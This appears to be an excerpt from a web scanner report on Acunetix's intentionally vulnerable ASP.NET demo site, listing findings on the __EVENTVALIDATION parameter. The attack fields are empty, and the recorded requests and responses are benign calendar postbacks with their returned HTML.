URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8487&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAwF8fL9sIZGRkV20IbfJbgcpJz4fVA8Gtk5YI85o%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKnu%2FLaBgLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwctRsckdaXDphbGF%2BFy6nmQoC2xOA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:25 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAwF8fL9sIZGRkV20IbfJbgcpJz4fVA8Gtk5YI85o=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKnu/LaBgLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwctRsckdaXDphbGF+Fy6nmQoC2xOA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:White" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1103 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,103 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8217&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAOKT0WtoIZGRkpNKC%2BCbl%2FT8Kh6POfuYqtCLK7hI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKNw%2BYYArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp%2FUCAuadp%2FUCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl%2BYFAuadl%2BYFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C%2B6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5D6ajA2voIDI%2FjCbkX6%2B6gLWhGPFH
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:07 GMT Content-Length: 12458
Response Body - size: 12,458 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAAOKT0WtoIZGRkpNKC+Cbl/T8Kh6POfuYqtCLK7hI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKNw+YYArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5D6ajA2voIDI/jCbkX6+6gLWhGPFH" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:White" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
